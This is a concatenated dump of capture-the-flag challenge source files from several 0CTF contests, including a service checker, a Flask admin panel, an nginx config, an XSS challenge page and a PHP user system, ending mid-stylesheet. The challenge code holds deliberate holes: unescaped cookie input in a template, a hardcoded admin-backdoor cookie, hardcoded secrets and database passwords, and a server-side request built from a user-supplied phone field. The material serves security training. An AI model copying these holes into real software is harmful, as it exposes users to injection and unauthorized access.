127.0.0.1 -p tcp --dport 8080 -j ACCEPT 73 | 74 | rm -rf z0ne 75 | rm -f install.sql nginx.conf readme.txt sudoers openresty-1.9.7.4.tar.gz z0ne.zip -------------------------------------------------------------------------------- /0ctf2016-final/checker/check_post.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=utf-8 3 | import MySQLdb 4 | import requests 5 | import random 6 | import string 7 | 8 | service = 'z0ne' 9 | timeout = 10 # define timeout here 10 | author = 'md5_salt' # author 11 | 12 | sql_list = ['', 13 | '' 14 | ] 15 | 16 | 17 | def genRandomLetters(length): 18 | return ''.join([random.choice(string.letters) for i in xrange(length)]) 19 | 20 | def getTeamID(host): 21 | return int(host[8:10]) 22 | 23 | def exploit(host): 24 | port = 8000 25 | #这里host应该为mysql的host,改unix_socket 26 | conn = MySQLdb.connect(host=host,user='root',passwd='v8y1qjq9Xx8mDcwd',db='z0ne',charset="utf8")#, unix_socket='/Applications/MAMP/tmp/mysql/mysql.sock') 27 | conn.autocommit(True) 28 | cursor = conn.cursor() 29 | 30 | try: 31 | email = genRandomLetters(8)+'@example.com' 32 | password = genRandomLetters(8) 33 | if not 'User added' in requests.post('http://%s:%d/save_user'%(host, port), data={'user-email': email, 'user-new-password': password}).text: 34 | raise Exception("Reg user error") 35 | 36 | sql = "SELECT * FROM users WHERE email = %s" 37 | cursor.execute(sql, [email]) 38 | result = cursor.fetchone() 39 | 40 | secret = result[4] 41 | s = requests.Session() 42 | if not 'activate successfully' in s.post('http://%s:%d/activate'%(host, port), data={'user-email': email, 'secret': secret}).text: 43 | raise Exception("Active user error") 44 | 45 | s = requests.Session() 46 | if not 'You are logged in' in s.post('http://%s:%d/login'%(host,port), data={'login-username':email, 'login-password': password}).text: 47 | raise Exception("Login error") 48 | 49 | post_title = genRandomLetters(8) 50 | post_content = genRandomLetters(64) 51 | if 'New post created!' not in s.post('http://%s:%d/newpost'%(host, port), data={'post-title':post_title, 'post-full':post_content}).text: 52 | raise Exception("New post error") 53 | 54 | sql = "select pid from posts where title=%s and author=%s" 55 | cursor.execute(sql, [post_title, email]) 56 | result = cursor.fetchone() 57 | if not result: 58 | raise Exception("New post not in database") 59 | pid = result[0] 60 | 61 | if post_content not in s.get('http://%s:%d/post/%d'%(host, port, int(pid))).text: 62 | raise Exception("post content error") 63 | 64 | message = 'OK' 65 | except Exception as e: 66 | message = str(e) 67 | 68 | sql = "DELETE FROM users WHERE email = %s" 69 | cursor.execute(sql, [email]) 70 | sql = "DELETE FROM posts WHERE pid = %d"%int(pid) 71 | cursor.execute(sql) 72 | 73 | return message 74 | 75 | if __name__ == '__main__': 76 | print exploit('100.64.105.11') 77 | -------------------------------------------------------------------------------- /0ctf2017-qual/complicatedxss_500/admin.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | #!/usr/bin/python 3 | 4 | from tornado.wsgi import WSGIContainer 5 | from tornado.httpserver import HTTPServer 6 | from tornado.ioloop import IOLoop 7 | 8 | from functools import wraps 9 | from flask import request, Flask, session, redirect, url_for, render_template_string, make_response, flash 10 | 11 | app = Flask(__name__) 12 | app.secret_key = 'A0@#$8jdfsdfs~XHH!jmasddas?RT' 13 | app.config['SERVER_NAME'] = 'admin.government.vip:8000' 14 | 15 | users = {'test':'test'} 16 | 17 | index_html = ''' 18 | 19 | 20 | Admin Panel 21 | 31 | 32 | {% autoescape false %} 33 |

Hello {{ username }}

34 | {% endautoescape %} 35 | {% if user == 'admin' %} 36 |

Upload your shell

37 |
38 |

39 |

40 |

41 | {% else %} 42 |

Only admin can upload a shell

43 | {% endif %} 44 | ''' 45 | 46 | def logged_in(f): 47 | @wraps(f) 48 | def decorated_function(*args, **kwargs): 49 | if request.cookies.get('admin_secret') == 'md5_salt_is_the_real_admin': 50 | session['username'] = 'admin' 51 | if session.get('username') is not None: 52 | return f(*args, **kwargs) 53 | else: 54 | flash('Please log in first.', 'error') 55 | return redirect(url_for('login')) 56 | return decorated_function 57 | 58 | @app.route('/') 59 | @logged_in 60 | def index(): 61 | return render_template_string(index_html, username=request.cookies.get('username'), user=session['username']) 62 | 63 | @app.route('/login', methods=['GET', 'POST']) 64 | def login(): 65 | if request.method == 'POST': 66 | if users.get(request.form['username']) == request.form['password']: 67 | session['username'] = request.form['username'] 68 | resp = make_response(redirect(url_for('index'))) 69 | resp.set_cookie('username', request.form['username']) 70 | return resp 71 | return ''' 72 |
73 |

Username 74 |

Password 75 |

76 |

77 | ''' 78 | 79 | @app.route('/upload', methods=['POST']) 80 | @logged_in 81 | def upload_file(): 82 | if request.method == 'POST' and session['username'] == 'admin': 83 | file = request.files['file'] 84 | if file: 85 | return 'flag{xss_is_fun_2333333}' 86 | return 'hey dude, upload your shell' 87 | 88 | 89 | if __name__ == '__main__': 90 | http_server = HTTPServer(WSGIContainer(app)) 91 | http_server.listen(8000) #flask默认的端口,可任意修改 92 | IOLoop.instance().start() 93 | #app.run(debug=True,port=8000) -------------------------------------------------------------------------------- /0ctf2017-qual/simplesqlin_100/nginx.conf: -------------------------------------------------------------------------------- 1 | 2 | user www-data; 3 | worker_processes 1; 4 | 5 | #error_log logs/error.log; 6 | #error_log logs/error.log notice; 7 | #error_log logs/error.log info; 8 | 9 | #pid logs/nginx.pid; 10 | 11 | 12 | events { 13 | worker_connections 1024; 14 | } 15 | 16 | 17 | http { 18 | include mime.types; 19 | default_type application/octet-stream; 20 | 21 | #log_format main '$remote_addr - $remote_user [$time_local] "$request" ' 22 | # '$status $body_bytes_sent "$http_referer" ' 23 | # '"$http_user_agent" "$http_x_forwarded_for"'; 24 | 25 | #access_log logs/access.log main; 26 | 27 | sendfile on; 28 | #tcp_nopush on; 29 | 30 | #keepalive_timeout 0; 31 | keepalive_timeout 65; 32 | 33 | #gzip on; 34 | lua_package_path "/usr/local/openresty/nginx/conf/waf/?.lua"; 35 | lua_shared_dict limit 10m; 36 | init_by_lua_file /usr/local/openresty/nginx/conf/waf/init.lua; 37 | access_by_lua_file /usr/local/openresty/nginx/conf/waf/waf.lua; 38 | 39 | server { 40 | listen 80; 41 | server_name localhost; 42 | 43 | #charset koi8-r; 44 | 45 | #access_log logs/host.access.log main; 46 | 47 | location / { 48 | root /usr/local/openresty/nginx/html; 49 | index index.php index.html index.htm; 50 | } 51 | 52 | #error_page 404 /404.html; 53 | 54 | # redirect server error pages to the static page /50x.html 55 | # 56 | error_page 500 502 503 504 /50x.html; 57 | location = /50x.html { 58 | root html; 59 | } 60 | 61 | # proxy the PHP scripts to Apache listening on 127.0.0.1:80 62 | # 63 | #location ~ \.php$ { 64 | # proxy_pass http://127.0.0.1; 65 | #} 66 | 67 | # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 68 | # 69 | location ~ \.php$ { 70 | root /usr/local/openresty/nginx/html; 71 | fastcgi_pass unix:/run/php/php7.0-fpm.sock; 72 | fastcgi_index index.php; 73 | fastcgi_param SCRIPT_FILENAME /usr/local/openresty/nginx/html$fastcgi_script_name; 74 | include fastcgi_params; 75 | } 76 | 77 | # deny access to .htaccess files, if Apache's document root 78 | # concurs with nginx's one 79 | # 80 | #location ~ /\.ht { 81 | # deny all; 82 | #} 83 | } 84 | 85 | 86 | # another virtual host using mix of IP-, name-, and port-based configuration 87 | # 88 | #server { 89 | # listen 8000; 90 | # listen somename:8080; 91 | # server_name somename alias another.alias; 92 | 93 | # location / { 94 | # root html; 95 | # index index.html index.htm; 96 | # } 97 | #} 98 | 99 | 100 | # HTTPS server 101 | # 102 | #server { 103 | # listen 443 ssl; 104 | # server_name localhost; 105 | 106 | # ssl_certificate cert.pem; 107 | # ssl_certificate_key cert.key; 108 | 109 | # ssl_session_cache shared:SSL:1m; 110 | # ssl_session_timeout 5m; 111 | 112 | # ssl_ciphers HIGH:!aNULL:!MD5; 113 | # ssl_prefer_server_ciphers on; 114 | 115 | # location / { 116 | # root html; 117 | # index index.html index.htm; 118 | # } 119 | #} 120 | 121 | } 122 | -------------------------------------------------------------------------------- /0ctf2017-qual/simplexss/index.php: -------------------------------------------------------------------------------- 1 | 11 | 12 | 15 | 16 | 17 | 18 | 19 | Simple XSS 20 | 21 | 22 | 23 | 24 | 25 | 26 |
27 |
28 |

Simple XSS

29 |

Flag is in flag.php with ip restriction

30 |

No bruteforcing and scanning!

31 |

Try to bypass filter and exploit

32 |

Capcha is not needed for preview.

33 |

Always use latest Chrome

34 |
35 |

Try to find a string $str so that (substr(md5($str), 0, 6) === '').

36 |
37 |
38 | 39 | 41 | 42 | 44 |
45 |
46 |

Loading capcha......

47 |

Drag to the right place

48 |
49 | 50 | 51 |
52 |
53 | 91 | 92 | -------------------------------------------------------------------------------- /0ctf2018-qual/easy_ums/common.php: -------------------------------------------------------------------------------- 1 | prepare("SELECT * FROM users WHERE username=?"); 15 | $stmt->bind_param("s", $username); 16 | $stmt->execute(); 17 | $result = $stmt->get_result(); 18 | if($result->num_rows === 0) return false; 19 | else return true; 20 | } 21 | 22 | function check_phone($phone){ 23 | global $mysqli; 24 | if(!filter_phone($phone)) return false; 25 | $stmt = $mysqli->prepare("SELECT * FROM users WHERE phone=?"); 26 | $stmt->bind_param("s", $phone); 27 | $stmt->execute(); 28 | $result = $stmt->get_result(); 29 | if($result->num_rows === 0) return false; 30 | else return true; 31 | } 32 | 33 | function register($username, $password, $phone){ 34 | global $mysqli; 35 | if(strlen($username) > 16) return false; 36 | if(check_user($username)) return false; 37 | if(check_phone($phone)) return false; 38 | $password = md5($password); 39 | $stmt = $mysqli->prepare("INSERT INTO users(username, password, phone) VALUES(?, ?, ?)"); 40 | $stmt->bind_param("sss", $username, $password, $phone); 41 | $stmt->execute(); 42 | return $stmt->insert_id; 43 | } 44 | 45 | function login($username, $password){ 46 | global $mysqli; 47 | $password = md5($password); 48 | $stmt = $mysqli->prepare("SELECT * FROM users WHERE username=? and password=?"); 49 | $stmt->bind_param("ss", $username, $password); 50 | $stmt->execute(); 51 | $result = $stmt->get_result(); 52 | if($result->num_rows === 0) return false; 53 | $row = $result->fetch_assoc(); 54 | $_SESSION['id'] = $row['id']; 55 | $_SESSION['username'] = $row['username']; 56 | $_SESSION['phone'] = $row['phone']; 57 | $_SESSION['verify'] = $row['verify']; 58 | return true; 59 | } 60 | 61 | function send_sms($phone, $msg){ 62 | change_log($phone); 63 | $url = 'http://'.$phone.'/?'.$msg; 64 | $ch = curl_init((string)$url); 65 | curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 3); 66 | //curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'HEAD'); 67 | curl_setopt($ch, CURLOPT_TIMEOUT, 3); 68 | curl_setopt($ch, CURLOPT_NOBODY, 1); 69 | return curl_exec($ch); 70 | } 71 | 72 | function set_verify(){ 73 | global $mysqli; 74 | $mysqli->query("UPDATE users SET verify=1 WHERE id=".$_SESSION['id']); 75 | } 76 | 77 | function unset_verify(){ 78 | global $mysqli; 79 | $mysqli->query("UPDATE users SET verify=0 WHERE id=".$_SESSION['id']); 80 | } 81 | 82 | function check_verify(){ 83 | if($_SESSION['verify'] !== 1){ 84 | header("Location: verify.php"); 85 | die(); 86 | } 87 | } 88 | 89 | function update_phone($phone){ 90 | if($_SESSION['id'] === 1) return false; 91 | global $mysqli; 92 | $stmt = $mysqli->prepare("UPDATE users SET phone=? WHERE id=?"); 93 | $stmt->bind_param("si", $phone, $_SESSION['id']); 94 | $stmt->execute(); 95 | return true; 96 | } 97 | 98 | function check_login(){ 99 | if($_SESSION['id']) return true; 100 | else{ 101 | header("Location: login.php"); 102 | die(); 103 | }; 104 | } 105 | 106 | function generate_code($phone){ 107 | global $flag; 108 | return md5(mt_rand().$flag.mt_rand().$phone); 109 | } 110 | 111 | function insert_code($phone, $code){ 112 | global $mysqli; 113 | delete_code(); // !!!! 114 | $stmt = $mysqli->prepare("INSERT INTO tokens(uid, phone, token) VALUES(?, ?, ?)"); 115 | $stmt->bind_param("iss",$_SESSION['id'], $phone, $code); 116 | $stmt->execute(); 117 | } 118 | 119 | function delete_code(){ 120 | global $mysqli; 121 | $stmt = $mysqli->prepare("DELETE FROM tokens WHERE uid=?"); 122 | $stmt->bind_param("i", $_SESSION['id']); 123 | $stmt->execute(); 124 | } 125 | 126 | function check_code($phone, $code){ 127 | global $mysqli; 128 | $stmt = $mysqli->prepare("SELECT * FROM tokens WHERE phone=? and token=? and uid=?"); 129 | $stmt->bind_param("ssi", $phone, $code, $_SESSION['id']); 130 | $stmt->execute(); 131 | $result = $stmt->get_result(); 132 | if($result->num_rows === 0) return false; 133 | else return true; 134 | } 135 | 136 | function change_log($phone){ 137 | global $mysqli; 138 | $stmt = $mysqli->prepare("INSERT INTO change_log(uid, phone, ip) VALUES(?, ?, ?)"); 139 | $stmt->bind_param("iss",$_SESSION['id'], $phone, $_SERVER['REMOTE_ADDR']); 140 | $stmt->execute(); 141 | } 142 | 143 | function get_flag(){ 144 | global $mysqli; 145 | $stmt = $mysqli->prepare("SELECT * FROM users WHERE id=?"); 146 | $stmt->bind_param("i", $_SESSION['id']); 147 | $stmt->execute(); 148 | $result = $stmt->get_result(); 149 | if($result->num_rows === 0) return false; 150 | $row = $result->fetch_assoc(); 151 | if($row['phone'] === '8.8.8.8' && $row['verify'] === 1){ 152 | return true; 153 | } 154 | } 155 | -------------------------------------------------------------------------------- /ISG2014/safesite/main/static/bootstrap-theme.min.css: -------------------------------------------------------------------------------- 1 | /*! 2 | * Bootstrap v3.2.0 (http://getbootstrap.com) 3 | * Copyright 2011-2014 Twitter, Inc. 4 | * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) 5 | */.btn-default,.btn-primary,.btn-success,.btn-info,.btn-warning,.btn-danger{text-shadow:0 -1px 0 rgba(0,0,0,.2);-webkit-box-shadow:inset 0 1px 0 rgba(255,255,255,.15),0 1px 1px rgba(0,0,0,.075);box-shadow:inset 0 1px 0 rgba(255,255,255,.15),0 1px 1px rgba(0,0,0,.075)}.btn-default:active,.btn-primary:active,.btn-success:active,.btn-info:active,.btn-warning:active,.btn-danger:active,.btn-default.active,.btn-primary.active,.btn-success.active,.btn-info.active,.btn-warning.active,.btn-danger.active{-webkit-box-shadow:inset 0 3px 5px rgba(0,0,0,.125);box-shadow:inset 0 3px 5px rgba(0,0,0,.125)}.btn:active,.btn.active{background-image:none}.btn-default{text-shadow:0 1px 0 #fff;background-image:-webkit-linear-gradient(top,#fff 0,#e0e0e0 100%);background-image:-o-linear-gradient(top,#fff 0,#e0e0e0 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#fff),to(#e0e0e0));background-image:linear-gradient(to bottom,#fff 0,#e0e0e0 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffffff', endColorstr='#ffe0e0e0', GradientType=0);filter:progid:DXImageTransform.Microsoft.gradient(enabled=false);background-repeat:repeat-x;border-color:#dbdbdb;border-color:#ccc}.btn-default:hover,.btn-default:focus{background-color:#e0e0e0;background-position:0 -15px}.btn-default:active,.btn-default.active{background-color:#e0e0e0;border-color:#dbdbdb}.btn-default:disabled,.btn-default[disabled]{background-color:#e0e0e0;background-image:none}.btn-primary{background-image:-webkit-linear-gradient(top,#428bca 0,#2d6ca2 100%);background-image:-o-linear-gradient(top,#428bca 0,#2d6ca2 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#428bca),to(#2d6ca2));background-image:linear-gradient(to bottom,#428bca 0,#2d6ca2 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff428bca', endColorstr='#ff2d6ca2', GradientType=0);filter:progid:DXImageTransform.Microsoft.gradient(enabled=false);background-repeat:repeat-x;border-color:#2b669a}.btn-primary:hover,.btn-primary:focus{background-color:#2d6ca2;background-position:0 -15px}.btn-primary:active,.btn-primary.active{background-color:#2d6ca2;border-color:#2b669a}.btn-primary:disabled,.btn-primary[disabled]{background-color:#2d6ca2;background-image:none}.btn-success{background-image:-webkit-linear-gradient(top,#5cb85c 0,#419641 100%);background-image:-o-linear-gradient(top,#5cb85c 0,#419641 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#5cb85c),to(#419641));background-image:linear-gradient(to bottom,#5cb85c 0,#419641 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff5cb85c', endColorstr='#ff419641', GradientType=0);filter:progid:DXImageTransform.Microsoft.gradient(enabled=false);background-repeat:repeat-x;border-color:#3e8f3e}.btn-success:hover,.btn-success:focus{background-color:#419641;background-position:0 -15px}.btn-success:active,.btn-success.active{background-color:#419641;border-color:#3e8f3e}.btn-success:disabled,.btn-success[disabled]{background-color:#419641;background-image:none}.btn-info{background-image:-webkit-linear-gradient(top,#5bc0de 0,#2aabd2 100%);background-image:-o-linear-gradient(top,#5bc0de 0,#2aabd2 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#5bc0de),to(#2aabd2));background-image:linear-gradient(to bottom,#5bc0de 0,#2aabd2 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff5bc0de', endColorstr='#ff2aabd2', GradientType=0);filter:progid:DXImageTransform.Microsoft.gradient(enabled=false);background-repeat:repeat-x;border-color:#28a4c9}.btn-info:hover,.btn-info:focus{background-color:#2aabd2;background-position:0 -15px}.btn-info:active,.btn-info.active{background-color:#2aabd2;border-color:#28a4c9}.btn-info:disabled,.btn-info[disabled]{background-color:#2aabd2;background-image:none}.btn-warning{background-image:-webkit-linear-gradient(top,#f0ad4e 0,#eb9316 100%);background-image:-o-linear-gradient(top,#f0ad4e 0,#eb9316 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#f0ad4e),to(#eb9316));background-image:linear-gradient(to bottom,#f0ad4e 0,#eb9316 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff0ad4e', endColorstr='#ffeb9316', GradientType=0);filter:progid:DXImageTransform.Microsoft.gradient(enabled=false);background-repeat:repeat-x;border-color:#e38d13}.btn-warning:hover,.btn-warning:focus{background-color:#eb9316;background-position:0 -15px}.btn-warning:active,.btn-warning.active{background-color:#eb9316;border-color:#e38d13}.btn-warning:disabled,.btn-warning[disabled]{background-color:#eb9316;background-image:none}.btn-danger{background-image:-webkit-linear-gradient(top,#d9534f 0,#c12e2a 100%);background-image:-o-linear-gradient(top,#d9534f 0,#c12e2a 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#d9534f),to(#c12e2a));background-image:linear-gradient(to bottom,#d9534f 0,#c12e2a 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffd9534f', endColorstr='#ffc12e2a', GradientType=0);filter:progid:DXImageTransform.Microsoft.gradient(enabled=false);background-repeat:repeat-x;border-color:#b92c28}.btn-danger:hover,.btn-danger:focus{background-color:#c12e2a;background-position:0 -15px}.btn-danger:active,.btn-danger.active{background-color:#c12e2a;border-color:#b92c28}.btn-danger:disabled,.btn-danger[disabled]{background-color:#c12e2a;background-image:none}.thumbnail,.img-thumbnail{-webkit-box-shadow:0 1px 2px rgba(0,0,0,.075);box-shadow:0 1px 2px rgba(0,0,0,.075)}.dropdown-menu>li>a:hover,.dropdown-menu>li>a:focus{background-color:#e8e8e8;background-image:-webkit-linear-gradient(top,#f5f5f5 0,#e8e8e8 100%);background-image:-o-linear-gradient(top,#f5f5f5 0,#e8e8e8 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#f5f5f5),to(#e8e8e8));background-image:linear-gradient(to bottom,#f5f5f5 0,#e8e8e8 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff5f5f5', endColorstr='#ffe8e8e8', GradientType=0);background-repeat:repeat-x}.dropdown-menu>.active>a,.dropdown-menu>.active>a:hover,.dropdown-menu>.active>a:focus{background-color:#357ebd;background-image:-webkit-linear-gradient(top,#428bca 0,#357ebd 100%);background-image:-o-linear-gradient(top,#428bca 0,#357ebd 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#428bca),to(#357ebd));background-image:linear-gradient(to bottom,#428bca 0,#357ebd 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff428bca', endColorstr='#ff357ebd', GradientType=0);background-repeat:repeat-x}.navbar-default{background-image:-webkit-linear-gradient(top,#fff 0,#f8f8f8 100%);background-image:-o-linear-gradient(top,#fff 0,#f8f8f8 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#fff),to(#f8f8f8));background-image:linear-gradient(to bottom,#fff 0,#f8f8f8 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffffff', endColorstr='#fff8f8f8', GradientType=0);filter:progid:DXImageTransform.Microsoft.gradient(enabled=false);background-repeat:repeat-x;border-radius:4px;-webkit-box-shadow:inset 0 1px 0 rgba(255,255,255,.15),0 1px 5px rgba(0,0,0,.075);box-shadow:inset 0 1px 0 rgba(255,255,255,.15),0 1px 5px rgba(0,0,0,.075)}.navbar-default .navbar-nav>.active>a{background-image:-webkit-linear-gradient(top,#ebebeb 0,#f3f3f3 100%);background-image:-o-linear-gradient(top,#ebebeb 0,#f3f3f3 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#ebebeb),to(#f3f3f3));background-image:linear-gradient(to bottom,#ebebeb 0,#f3f3f3 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffebebeb', endColorstr='#fff3f3f3', GradientType=0);background-repeat:repeat-x;-webkit-box-shadow:inset 0 3px 9px rgba(0,0,0,.075);box-shadow:inset 0 3px 9px rgba(0,0,0,.075)}.navbar-brand,.navbar-nav>li>a{text-shadow:0 1px 0 rgba(255,255,255,.25)}.navbar-inverse{background-image:-webkit-linear-gradient(top,#3c3c3c 0,#222 100%);background-image:-o-linear-gradient(top,#3c3c3c 0,#222 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#3c3c3c),to(#222));background-image:linear-gradient(to bottom,#3c3c3c 0,#222 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff3c3c3c', endColorstr='#ff222222', GradientType=0);filter:progid:DXImageTransform.Microsoft.gradient(enabled=false);background-repeat:repeat-x}.navbar-inverse .navbar-nav>.active>a{background-image:-webkit-linear-gradient(top,#222 0,#282828 100%);background-image:-o-linear-gradient(top,#222 0,#282828 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#222),to(#282828));background-image:linear-gradient(to bottom,#222 0,#282828 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff222222', endColorstr='#ff282828', GradientType=0);background-repeat:repeat-x;-webkit-box-shadow:inset 0 3px 9px rgba(0,0,0,.25);box-shadow:inset 0 3px 9px rgba(0,0,0,.25)}.navbar-inverse .navbar-brand,.navbar-inverse .navbar-nav>li>a{text-shadow:0 -1px 0 rgba(0,0,0,.25)}.navbar-static-top,.navbar-fixed-top,.navbar-fixed-bottom{border-radius:0}.alert{text-shadow:0 1px 0 rgba(255,255,255,.2);-webkit-box-shadow:inset 0 1px 0 rgba(255,255,255,.25),0 1px 2px rgba(0,0,0,.05);box-shadow:inset 0 1px 0 rgba(255,255,255,.25),0 1px 2px rgba(0,0,0,.05)}.alert-success{background-image:-webkit-linear-gradient(top,#dff0d8 0,#c8e5bc 100%);background-image:-o-linear-gradient(top,#dff0d8 0,#c8e5bc 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#dff0d8),to(#c8e5bc));background-image:linear-gradient(to bottom,#dff0d8 0,#c8e5bc 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffdff0d8', endColorstr='#ffc8e5bc', GradientType=0);background-repeat:repeat-x;border-color:#b2dba1}.alert-info{background-image:-webkit-linear-gradient(top,#d9edf7 0,#b9def0 100%);background-image:-o-linear-gradient(top,#d9edf7 0,#b9def0 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#d9edf7),to(#b9def0));background-image:linear-gradient(to bottom,#d9edf7 0,#b9def0 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffd9edf7', endColorstr='#ffb9def0', GradientType=0);background-repeat:repeat-x;border-color:#9acfea}.alert-warning{background-image:-webkit-linear-gradient(top,#fcf8e3 0,#f8efc0 100%);background-image:-o-linear-gradient(top,#fcf8e3 0,#f8efc0 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#fcf8e3),to(#f8efc0));background-image:linear-gradient(to bottom,#fcf8e3 0,#f8efc0 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fffcf8e3', endColorstr='#fff8efc0', GradientType=0);background-repeat:repeat-x;border-color:#f5e79e}.alert-danger{background-image:-webkit-linear-gradient(top,#f2dede 0,#e7c3c3 100%);background-image:-o-linear-gradient(top,#f2dede 0,#e7c3c3 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#f2dede),to(#e7c3c3));background-image:linear-gradient(to bottom,#f2dede 0,#e7c3c3 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff2dede', endColorstr='#ffe7c3c3', GradientType=0);background-repeat:repeat-x;border-color:#dca7a7}.progress{background-image:-webkit-linear-gradient(top,#ebebeb 0,#f5f5f5 100%);background-image:-o-linear-gradient(top,#ebebeb 0,#f5f5f5 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#ebebeb),to(#f5f5f5));background-image:linear-gradient(to bottom,#ebebeb 0,#f5f5f5 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffebebeb', endColorstr='#fff5f5f5', GradientType=0);background-repeat:repeat-x}.progress-bar{background-image:-webkit-linear-gradient(top,#428bca 0,#3071a9 100%);background-image:-o-linear-gradient(top,#428bca 0,#3071a9 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#428bca),to(#3071a9));background-image:linear-gradient(to bottom,#428bca 0,#3071a9 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff428bca', endColorstr='#ff3071a9', GradientType=0);background-repeat:repeat-x}.progress-bar-success{background-image:-webkit-linear-gradient(top,#5cb85c 0,#449d44 100%);background-image:-o-linear-gradient(top,#5cb85c 0,#449d44 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#5cb85c),to(#449d44));background-image:linear-gradient(to bottom,#5cb85c 0,#449d44 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff5cb85c', endColorstr='#ff449d44', GradientType=0);background-repeat:repeat-x}.progress-bar-info{background-image:-webkit-linear-gradient(top,#5bc0de 0,#31b0d5 100%);background-image:-o-linear-gradient(top,#5bc0de 0,#31b0d5 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#5bc0de),to(#31b0d5));background-image:linear-gradient(to bottom,#5bc0de 0,#31b0d5 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff5bc0de', endColorstr='#ff31b0d5', GradientType=0);background-repeat:repeat-x}.progress-bar-warning{background-image:-webkit-linear-gradient(top,#f0ad4e 0,#ec971f 100%);background-image:-o-linear-gradient(top,#f0ad4e 0,#ec971f 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#f0ad4e),to(#ec971f));background-image:linear-gradient(to bottom,#f0ad4e 0,#ec971f 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff0ad4e', endColorstr='#ffec971f', GradientType=0);background-repeat:repeat-x}.progress-bar-danger{background-image:-webkit-linear-gradient(top,#d9534f 0,#c9302c 100%);background-image:-o-linear-gradient(top,#d9534f 0,#c9302c 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#d9534f),to(#c9302c));background-image:linear-gradient(to bottom,#d9534f 0,#c9302c 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffd9534f', endColorstr='#ffc9302c', GradientType=0);background-repeat:repeat-x}.progress-bar-striped{background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:-o-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent)}.list-group{border-radius:4px;-webkit-box-shadow:0 1px 2px rgba(0,0,0,.075);box-shadow:0 1px 2px rgba(0,0,0,.075)}.list-group-item.active,.list-group-item.active:hover,.list-group-item.active:focus{text-shadow:0 -1px 0 #3071a9;background-image:-webkit-linear-gradient(top,#428bca 0,#3278b3 100%);background-image:-o-linear-gradient(top,#428bca 0,#3278b3 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#428bca),to(#3278b3));background-image:linear-gradient(to bottom,#428bca 0,#3278b3 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff428bca', endColorstr='#ff3278b3', GradientType=0);background-repeat:repeat-x;border-color:#3278b3}.panel{-webkit-box-shadow:0 1px 2px rgba(0,0,0,.05);box-shadow:0 1px 2px rgba(0,0,0,.05)}.panel-default>.panel-heading{background-image:-webkit-linear-gradient(top,#f5f5f5 0,#e8e8e8 100%);background-image:-o-linear-gradient(top,#f5f5f5 0,#e8e8e8 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#f5f5f5),to(#e8e8e8));background-image:linear-gradient(to bottom,#f5f5f5 0,#e8e8e8 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff5f5f5', endColorstr='#ffe8e8e8', GradientType=0);background-repeat:repeat-x}.panel-primary>.panel-heading{background-image:-webkit-linear-gradient(top,#428bca 0,#357ebd 100%);background-image:-o-linear-gradient(top,#428bca 0,#357ebd 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#428bca),to(#357ebd));background-image:linear-gradient(to bottom,#428bca 